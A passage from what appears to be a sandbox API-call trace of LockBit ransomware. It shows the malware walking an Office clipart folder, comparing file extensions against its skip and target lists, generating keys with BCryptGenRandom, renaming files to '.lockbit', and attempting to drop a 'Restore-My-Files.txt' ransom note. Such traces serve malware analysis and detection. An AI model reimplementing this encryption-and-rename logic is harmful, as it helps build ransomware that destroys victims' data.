lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0177.428] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0177.428] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.lockbit") returned 72 [0177.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.433] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.433] malloc (_Size=0x40068) returned 0x3df0008 [0177.433] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4219) returned 1 [0177.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.434] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.436] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.436] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.436] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.437] free (_Block=0x1fa2ed8) [0177.437] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.437] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.437] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.437] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1a2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SPRNG_01.MID", cAlternateFileName="")) returned 1 [0177.437] lstrcmpiW (lpString1=".", lpString2="SPRNG_01.MID") returned -1 [0177.437] lstrcmpiW (lpString1="..", lpString2="SPRNG_01.MID") returned -1 [0177.438] PathFindExtensionW (pszPath="SPRNG_01.MID") returned=".MID" [0177.438] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0177.438] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0177.438] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0177.439] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SPRNG_01.MID") returned -1 [0177.439] lstrcmpiW (lpString1="ntldr", lpString2="SPRNG_01.MID") returned -1 [0177.439] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SPRNG_01.MID") returned -1 [0177.439] lstrcmpiW (lpString1="bootsect.bak", lpString2="SPRNG_01.MID") returned -1 [0177.439] lstrcmpiW (lpString1="autorun.inf", lpString2="SPRNG_01.MID") returned -1 [0177.439] lstrcmpiW (lpString1="thumbs.db", lpString2="SPRNG_01.MID") returned 1 [0177.439] lstrcmpiW (lpString1="iconcache.db", lpString2="SPRNG_01.MID") returned -1 [0177.439] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.439] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned=".MID" [0177.439] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0177.439] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0177.440] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0177.440] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0177.440] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.lockbit") returned 72 [0177.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.446] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.447] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.447] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6700) returned 1 [0177.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.448] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.450] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.451] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.451] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.452] free (_Block=0x1fa2ed8) [0177.452] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.452] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.452] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0xbd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="STUBBY1.WMF", cAlternateFileName="")) returned 1 [0177.452] lstrcmpiW (lpString1=".", lpString2="STUBBY1.WMF") returned -1 [0177.453] lstrcmpiW (lpString1="..", lpString2="STUBBY1.WMF") returned -1 [0177.453] PathFindExtensionW (pszPath="STUBBY1.WMF") returned=".WMF" [0177.453] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.453] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.454] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.454] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="STUBBY1.WMF") returned -1 [0177.455] lstrcmpiW (lpString1="ntldr", lpString2="STUBBY1.WMF") returned -1 [0177.455] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="STUBBY1.WMF") returned -1 [0177.455] lstrcmpiW (lpString1="bootsect.bak", lpString2="STUBBY1.WMF") returned -1 [0177.455] lstrcmpiW (lpString1="autorun.inf", lpString2="STUBBY1.WMF") returned -1 [0177.455] lstrcmpiW (lpString1="thumbs.db", lpString2="STUBBY1.WMF") returned 1 [0177.455] lstrcmpiW (lpString1="iconcache.db", lpString2="STUBBY1.WMF") returned -1 [0177.455] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.455] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY1.WMF") returned=".WMF" [0177.455] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.455] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.455] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.456] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.456] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY1.WMF.lockbit") returned 71 [0177.456] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\stubby1.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.461] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.461] malloc (_Size=0x40068) returned 0x3df0008 [0177.461] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3030) returned 1 [0177.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.462] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY1.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY1.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.465] malloc (_Size=0xa4) returned 0x1fa2ed8 [0177.465] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0177.466] free (_Block=0x1fa2ed8) [0177.466] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY1.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.466] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.466] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.467] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x0, dwReserved1=0x0, cFileName="STUBBY2.WMF", cAlternateFileName="")) returned 1 [0177.467] lstrcmpiW (lpString1=".", lpString2="STUBBY2.WMF") returned -1 [0177.467] lstrcmpiW (lpString1="..", lpString2="STUBBY2.WMF") returned -1 [0177.467] PathFindExtensionW (pszPath="STUBBY2.WMF") returned=".WMF" [0177.467] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.467] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".msstyles", 